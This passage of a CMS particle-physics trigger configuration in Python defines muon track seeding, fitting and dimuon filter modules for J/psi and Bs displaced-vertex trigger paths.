cms.PSet( ),\n TSGForRoadSearchOI = cms.PSet( ),\n TSGForRoadSearchIOpxl = cms.PSet( ),\n TSGFromPropagation = cms.PSet( ),\n TSGFromCombinedHits = cms.PSet( )\n)\nhltL3TrackCandidateFromL2OIHit = cms.EDProducer( \"CkfTrajectoryMaker\",\n trackCandidateAlso = cms.bool( True ),\n src = cms.InputTag( \"hltL3TrajSeedOIHit\" ),\n TrajectoryBuilder = cms.string( \"hltESPMuonCkfTrajectoryBuilder\" ),\n TrajectoryCleaner = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n NavigationSchool = cms.string( \"SimpleNavigationSchool\" ),\n 
RedundantSeedCleaner = cms.string( \"CachingSeedCleanerBySharedInput\" ),\n useHitsSplitting = cms.bool( False ),\n TransientInitialStateEstimatorParameters = cms.PSet( \n propagatorAlongTISE = cms.string( \"PropagatorWithMaterial\" ),\n numberMeasurementsForFit = cms.int32( 4 ),\n propagatorOppositeTISE = cms.string( \"PropagatorWithMaterialOpposite\" )\n ),\n doSeedingRegionRebuilding = cms.bool( False ),\n cleanTrajectoryAfterInOut = cms.bool( False ),\n maxNSeeds = cms.uint32( 100000 )\n)\nhltL3TkTracksFromL2OIHit = cms.EDProducer( \"TrackProducer\",\n TrajectoryInEvent = cms.bool( True ),\n useHitsSplitting = cms.bool( False ),\n clusterRemovalInfo = cms.InputTag( \"\" ),\n alias = cms.untracked.string( \"\" ),\n Fitter = cms.string( \"hltESPKFFittingSmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n src = cms.InputTag( \"hltL3TrackCandidateFromL2OIHit\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n AlgorithmName = cms.string( \"undefAlgorithm\" ),\n NavigationSchool = cms.string( \"\" )\n)\nhltL3MuonsOIHit = cms.EDProducer( \"L3MuonProducer\",\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n L3TrajBuilderParameters = cms.PSet( \n ScaleTECyFactor = cms.double( -1.0 ),\n GlbRefitterParameters = cms.PSet( \n TrackerSkipSection = cms.int32( -1 ),\n DoPredictionsOnly = cms.bool( False ),\n PropDirForCosmics = cms.bool( False ),\n HitThreshold = cms.int32( 1 ),\n MuonHitsOption = cms.int32( 1 ),\n Chi2CutRPC = cms.double( 1.0 ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n Chi2CutCSC = cms.double( 150.0 ),\n Chi2CutDT = cms.double( 10.0 ),\n RefitRPCHits = cms.bool( True ),\n SkipStation = cms.int32( -1 ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" ),\n TrackerSkipSystem = cms.int32( -1 )\n ),\n ScaleTECxFactor = cms.double( -1.0 ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n MuonTrackingRegionBuilder = cms.PSet( \n EtaR_UpperLimit_Par1 = cms.double( 0.25 ),\n EtaR_UpperLimit_Par2 = cms.double( 0.15 ),\n OnDemand = cms.double( -1.0 ),\n Rescale_Dz = cms.double( 3.0 ),\n vertexCollection = cms.InputTag( \"pixelVertices\" ),\n Rescale_phi = cms.double( 3.0 ),\n Eta_fixed = cms.double( 0.2 ),\n DeltaZ_Region = cms.double( 15.9 ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n PhiR_UpperLimit_Par2 = cms.double( 0.2 ),\n Eta_min = cms.double( 0.05 ),\n Phi_fixed = cms.double( 0.2 ),\n DeltaR = cms.double( 0.2 ),\n EscapePt = cms.double( 1.5 ),\n UseFixedRegion = cms.bool( False ),\n PhiR_UpperLimit_Par1 = cms.double( 0.6 ),\n Rescale_eta = cms.double( 3.0 ),\n Phi_min = cms.double( 0.05 ),\n UseVertex = cms.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" )\n ),\n RefitRPCHits = cms.bool( True ),\n PCut = cms.double( 2.5 ),\n TrackTransformer = cms.PSet( \n DoPredictionsOnly = cms.bool( False ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n Smoother = cms.string( 
\"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n RefitRPCHits = cms.bool( True ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" )\n ),\n GlobalMuonTrackMatcher = cms.PSet( \n Pt_threshold1 = cms.double( 0.0 ),\n DeltaDCut_3 = cms.double( 15.0 ),\n MinP = cms.double( 2.5 ),\n MinPt = cms.double( 1.0 ),\n Chi2Cut_1 = cms.double( 50.0 ),\n Pt_threshold2 = cms.double( 9.99999999E8 ),\n LocChi2Cut = cms.double( 0.0010 ),\n Eta_threshold = cms.double( 1.2 ),\n Quality_3 = cms.double( 7.0 ),\n Quality_2 = cms.double( 15.0 ),\n Chi2Cut_2 = cms.double( 50.0 ),\n Chi2Cut_3 = cms.double( 200.0 ),\n DeltaDCut_1 = cms.double( 40.0 ),\n DeltaRCut_2 = cms.double( 0.2 ),\n DeltaRCut_3 = cms.double( 1.0 ),\n DeltaDCut_2 = cms.double( 10.0 ),\n DeltaRCut_1 = cms.double( 0.1 ),\n Propagator = cms.string( \"hltESPSmartPropagator\" ),\n Quality_1 = cms.double( 20.0 )\n ),\n PtCut = cms.double( 1.0 ),\n TrackerPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n tkTrajLabel = cms.InputTag( \"hltL3TkTracksFromL2OIHit\" )\n ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPSmartPropagatorAny',\n 'SteppingHelixPropagatorAny',\n 'hltESPSmartPropagator',\n 'hltESPSteppingHelixPropagatorOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n TrackLoaderParameters = cms.PSet( \n PutTkTrackIntoEvent = cms.untracked.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n SmoothTkTrack = cms.untracked.bool( False ),\n MuonSeededTracksInstance = cms.untracked.string( \"L2Seeded\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonUpdatorAtVertexParameters = cms.PSet( \n MaxChi2 = cms.double( 1000000.0 ),\n Propagator = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n BeamSpotPositionErrors = cms.vdouble( 0.1, 0.1, 5.3 )\n ),\n VertexConstraint = cms.bool( False ),\n DoSmoothing = cms.bool( True )\n )\n)\nhltL3TkFromL2OICombination = cms.EDProducer( \"L3TrackCombiner\",\n labels = cms.VInputTag( 'hltL3MuonsOIState','hltL3MuonsOIHit' )\n)\nhltL3TrajSeedIOHit = cms.EDProducer( \"TSGFromL2Muon\",\n PtCut = cms.double( 1.0 ),\n PCut = cms.double( 2.5 ),\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'PropagatorWithMaterial' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n MuonTrackingRegionBuilder = cms.PSet( \n EtaR_UpperLimit_Par1 = cms.double( 0.25 ),\n EtaR_UpperLimit_Par2 = cms.double( 0.15 ),\n OnDemand = cms.double( -1.0 ),\n Rescale_Dz = cms.double( 3.0 ),\n vertexCollection = cms.InputTag( \"pixelVertices\" ),\n Rescale_phi = cms.double( 3.0 ),\n Eta_fixed = cms.double( 0.2 ),\n DeltaZ_Region = cms.double( 15.9 ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n PhiR_UpperLimit_Par2 = cms.double( 0.2 ),\n Eta_min = cms.double( 0.1 ),\n Phi_fixed = cms.double( 0.2 ),\n DeltaR = cms.double( 0.2 ),\n EscapePt = cms.double( 1.5 ),\n UseFixedRegion = cms.bool( False ),\n PhiR_UpperLimit_Par1 = cms.double( 0.6 ),\n Rescale_eta = cms.double( 3.0 ),\n Phi_min = cms.double( 0.1 ),\n UseVertex = cms.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" )\n ),\n TkSeedGenerator = cms.PSet( \n PSetNames = cms.vstring( 'skipTSG',\n 'iterativeTSG' ),\n L3TkCollectionA = 
cms.InputTag( \"hltL3TkFromL2OICombination\" ),\n iterativeTSG = cms.PSet( \n firstTSG = cms.PSet( \n ComponentName = cms.string( \"TSGFromOrderedHits\" ),\n OrderedHitsFactoryPSet = cms.PSet( \n ComponentName = cms.string( \"StandardHitTripletGenerator\" ),\n GeneratorPSet = cms.PSet( \n useBending = cms.bool( True ),\n useFixedPreFiltering = cms.bool( False ),\n maxElement = cms.uint32( 0 ),\n phiPreFiltering = cms.double( 0.3 ),\n extraHitRPhitolerance = cms.double( 0.06 ),\n useMultScattering = cms.bool( True ),\n ComponentName = cms.string( \"PixelTripletHLTGenerator\" ),\n extraHitRZtolerance = cms.double( 0.06 ),\n SeedComparitorPSet = cms.PSet( ComponentName = cms.string( \"none\" ) )\n ),\n SeedingLayers = cms.string( \"hltESPPixelLayerTriplets\" )\n ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" )\n ),\n PSetNames = cms.vstring( 'firstTSG',\n 'secondTSG' ),\n ComponentName = cms.string( \"CombinedTSG\" ),\n thirdTSG = cms.PSet( \n PSetNames = cms.vstring( 'endcapTSG',\n 'barrelTSG' ),\n barrelTSG = cms.PSet( ),\n endcapTSG = cms.PSet( \n ComponentName = cms.string( \"TSGFromOrderedHits\" ),\n OrderedHitsFactoryPSet = cms.PSet( \n maxElement = cms.uint32( 0 ),\n ComponentName = cms.string( \"StandardHitPairGenerator\" ),\n SeedingLayers = cms.string( \"hltESPMixedLayerPairs\" ),\n useOnDemandTracker = cms.untracked.int32( 0 )\n ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" )\n ),\n etaSeparation = cms.double( 2.0 ),\n ComponentName = cms.string( \"DualByEtaTSG\" )\n ),\n secondTSG = cms.PSet( \n ComponentName = cms.string( \"TSGFromOrderedHits\" ),\n OrderedHitsFactoryPSet = cms.PSet( \n maxElement = cms.uint32( 0 ),\n ComponentName = cms.string( \"StandardHitPairGenerator\" ),\n SeedingLayers = cms.string( \"hltESPPixelLayerPairs\" ),\n useOnDemandTracker = cms.untracked.int32( 0 )\n ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" )\n )\n ),\n skipTSG = cms.PSet( ),\n ComponentName = cms.string( \"DualByL2TSG\" )\n ),\n TrackerSeedCleaner = cms.PSet( \n cleanerFromSharedHits = cms.bool( True ),\n ptCleaner = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n directionCleaner = cms.bool( True )\n ),\n TSGFromMixedPairs = cms.PSet( ),\n TSGFromPixelTriplets = cms.PSet( ),\n TSGFromPixelPairs = cms.PSet( ),\n TSGForRoadSearchOI = cms.PSet( ),\n TSGForRoadSearchIOpxl = cms.PSet( ),\n TSGFromPropagation = cms.PSet( ),\n TSGFromCombinedHits = cms.PSet( )\n)\nhltL3TrackCandidateFromL2IOHit = cms.EDProducer( \"CkfTrajectoryMaker\",\n trackCandidateAlso = cms.bool( True ),\n src = cms.InputTag( \"hltL3TrajSeedIOHit\" ),\n TrajectoryBuilder = cms.string( \"hltESPMuonCkfTrajectoryBuilder\" ),\n TrajectoryCleaner = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n NavigationSchool = cms.string( \"SimpleNavigationSchool\" ),\n RedundantSeedCleaner = cms.string( \"CachingSeedCleanerBySharedInput\" ),\n useHitsSplitting = cms.bool( False ),\n TransientInitialStateEstimatorParameters = cms.PSet( \n propagatorAlongTISE = cms.string( \"PropagatorWithMaterial\" ),\n numberMeasurementsForFit = cms.int32( 4 ),\n propagatorOppositeTISE = cms.string( \"PropagatorWithMaterialOpposite\" )\n ),\n doSeedingRegionRebuilding = cms.bool( False ),\n cleanTrajectoryAfterInOut = cms.bool( False ),\n maxNSeeds = cms.uint32( 100000 )\n)\nhltL3TkTracksFromL2IOHit = cms.EDProducer( \"TrackProducer\",\n TrajectoryInEvent = cms.bool( True ),\n useHitsSplitting = cms.bool( False ),\n 
clusterRemovalInfo = cms.InputTag( \"\" ),\n alias = cms.untracked.string( \"\" ),\n Fitter = cms.string( \"hltESPKFFittingSmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n src = cms.InputTag( \"hltL3TrackCandidateFromL2IOHit\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n AlgorithmName = cms.string( \"undefAlgorithm\" ),\n NavigationSchool = cms.string( \"\" )\n)\nhltL3MuonsIOHit = cms.EDProducer( \"L3MuonProducer\",\n MuonCollectionLabel = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),\n L3TrajBuilderParameters = cms.PSet( \n ScaleTECyFactor = cms.double( -1.0 ),\n GlbRefitterParameters = cms.PSet( \n TrackerSkipSection = cms.int32( -1 ),\n DoPredictionsOnly = cms.bool( False ),\n PropDirForCosmics = cms.bool( False ),\n HitThreshold = cms.int32( 1 ),\n MuonHitsOption = cms.int32( 1 ),\n Chi2CutRPC = cms.double( 1.0 ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n DTRecSegmentLabel = cms.InputTag( \"hltDt4DSegments\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n CSCRecSegmentLabel = cms.InputTag( \"hltCscSegments\" ),\n Chi2CutCSC = cms.double( 150.0 ),\n Chi2CutDT = cms.double( 10.0 ),\n RefitRPCHits = cms.bool( True ),\n SkipStation = cms.int32( -1 ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" ),\n TrackerSkipSystem = cms.int32( -1 )\n ),\n ScaleTECxFactor = cms.double( -1.0 ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n MuonTrackingRegionBuilder = cms.PSet( \n EtaR_UpperLimit_Par1 = cms.double( 0.25 ),\n EtaR_UpperLimit_Par2 = cms.double( 0.15 ),\n OnDemand = cms.double( -1.0 ),\n Rescale_Dz = cms.double( 3.0 ),\n vertexCollection = cms.InputTag( \"pixelVertices\" ),\n Rescale_phi = cms.double( 3.0 ),\n Eta_fixed = cms.double( 0.2 ),\n DeltaZ_Region = cms.double( 15.9 ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n PhiR_UpperLimit_Par2 = cms.double( 0.2 ),\n Eta_min = cms.double( 0.05 ),\n Phi_fixed = cms.double( 0.2 ),\n DeltaR = cms.double( 0.2 ),\n EscapePt = cms.double( 1.5 ),\n UseFixedRegion = cms.bool( False ),\n PhiR_UpperLimit_Par1 = cms.double( 0.6 ),\n Rescale_eta = cms.double( 3.0 ),\n Phi_min = cms.double( 0.05 ),\n UseVertex = cms.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" )\n ),\n RefitRPCHits = cms.bool( True ),\n PCut = cms.double( 2.5 ),\n TrackTransformer = cms.PSet( \n DoPredictionsOnly = cms.bool( False ),\n Fitter = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n TrackerRecHitBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonRecHitBuilder = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n RefitDirection = cms.string( \"insideOut\" ),\n RefitRPCHits = cms.bool( True ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" )\n ),\n GlobalMuonTrackMatcher = cms.PSet( \n Pt_threshold1 = cms.double( 0.0 ),\n DeltaDCut_3 = cms.double( 15.0 ),\n MinP = cms.double( 2.5 ),\n MinPt = cms.double( 1.0 ),\n Chi2Cut_1 = cms.double( 50.0 ),\n Pt_threshold2 = cms.double( 9.99999999E8 ),\n LocChi2Cut = cms.double( 0.0010 ),\n Eta_threshold = cms.double( 1.2 ),\n Quality_3 = cms.double( 7.0 ),\n Quality_2 = cms.double( 15.0 ),\n Chi2Cut_2 = 
cms.double( 50.0 ),\n Chi2Cut_3 = cms.double( 200.0 ),\n DeltaDCut_1 = cms.double( 40.0 ),\n DeltaRCut_2 = cms.double( 0.2 ),\n DeltaRCut_3 = cms.double( 1.0 ),\n DeltaDCut_2 = cms.double( 10.0 ),\n DeltaRCut_1 = cms.double( 0.1 ),\n Propagator = cms.string( \"hltESPSmartPropagator\" ),\n Quality_1 = cms.double( 20.0 )\n ),\n PtCut = cms.double( 1.0 ),\n TrackerPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n tkTrajLabel = cms.InputTag( \"hltL3TkTracksFromL2IOHit\" )\n ),\n ServiceParameters = cms.PSet( \n Propagators = cms.untracked.vstring( 'hltESPSmartPropagatorAny',\n 'SteppingHelixPropagatorAny',\n 'hltESPSmartPropagator',\n 'hltESPSteppingHelixPropagatorOpposite' ),\n RPCLayers = cms.bool( True ),\n UseMuonNavigation = cms.untracked.bool( True )\n ),\n TrackLoaderParameters = cms.PSet( \n PutTkTrackIntoEvent = cms.untracked.bool( False ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n SmoothTkTrack = cms.untracked.bool( False ),\n MuonSeededTracksInstance = cms.untracked.string( \"L2Seeded\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n MuonUpdatorAtVertexParameters = cms.PSet( \n MaxChi2 = cms.double( 1000000.0 ),\n Propagator = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n BeamSpotPositionErrors = cms.vdouble( 0.1, 0.1, 5.3 )\n ),\n VertexConstraint = cms.bool( False ),\n DoSmoothing = cms.bool( True )\n )\n)\nhltL3TrajectorySeed = cms.EDProducer( \"L3MuonTrajectorySeedCombiner\",\n labels = cms.VInputTag( 'hltL3TrajSeedIOHit','hltL3TrajSeedOIState','hltL3TrajSeedOIHit' )\n)\nhltL3TrackCandidateFromL2 = cms.EDProducer( \"L3TrackCandCombiner\",\n labels = cms.VInputTag( 'hltL3TrackCandidateFromL2IOHit','hltL3TrackCandidateFromL2OIHit','hltL3TrackCandidateFromL2OIState' )\n)\nhltL3TkTracksFromL2 = cms.EDProducer( \"L3TrackCombiner\",\n labels = cms.VInputTag( 'hltL3TkTracksFromL2IOHit','hltL3TkTracksFromL2OIHit','hltL3TkTracksFromL2OIState' )\n)\nhltL3MuonsLinksCombination = cms.EDProducer( \"L3TrackLinksCombiner\",\n labels = cms.VInputTag( 'hltL3MuonsOIState','hltL3MuonsOIHit','hltL3MuonsIOHit' )\n)\nhltL3Muons = cms.EDProducer( \"L3TrackCombiner\",\n labels = cms.VInputTag( 'hltL3MuonsOIState','hltL3MuonsOIHit','hltL3MuonsIOHit' )\n)\nhltL3MuonCandidates = cms.EDProducer( \"L3MuonCandidateProducer\",\n InputObjects = cms.InputTag( \"hltL3Muons\" ),\n InputLinksObjects = cms.InputTag( \"hltL3MuonsLinksCombination\" ),\n MuonPtOption = cms.string( \"Tracker\" )\n)\nhltDoubleMu4JpsiDisplacedL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.2 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 4.0 ),\n MinInvMass = cms.double( 2.9 ),\n MaxInvMass = cms.double( 3.3 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerDoubleMu4Jpsi = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n 
PreviousCandTag = cms.InputTag( \"hltDoubleMu4JpsiDisplacedL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltDisplacedmumuFilterDoubleMu4Jpsi = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 3.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.15 ),\n MinCosinePointingAngle = cms.double( 0.9 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDoubleMu4Jpsi\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltBoolEnd = cms.EDFilter( \"HLTBool\",\n result = cms.bool( True )\n)\nhltPreDoubleMu5JpsiDisplaced = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDoubleMu5JpsiDisplacedL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.2 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 6.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 5.0 ),\n MinInvMass = cms.double( 2.9 ),\n MaxInvMass = cms.double( 3.3 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerDoubleMu5Jpsi = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu5JpsiDisplacedL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltDisplacedmumuFilterDoubleMu5Jpsi = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 3.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.15 ),\n MinCosinePointingAngle = cms.double( 0.9 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDoubleMu5Jpsi\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDoubleMu4Dimuon4BsBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDoubleMu4BarrelBsL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 1.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair 
= cms.double( 3.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 4.0 ),\n MinInvMass = cms.double( 4.8 ),\n MaxInvMass = cms.double( 6.0 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerBs4 = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu4BarrelBsL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterBs4 = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerBs4\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDoubleMu4Dimuon6Bs = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDoubleMu4Dimuon6BsL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 5.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 4.0 ),\n MinInvMass = cms.double( 4.8 ),\n MaxInvMass = cms.double( 6.0 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerBs6 = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDoubleMu4Dimuon6BsL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterBs6 = cms.EDFilter( 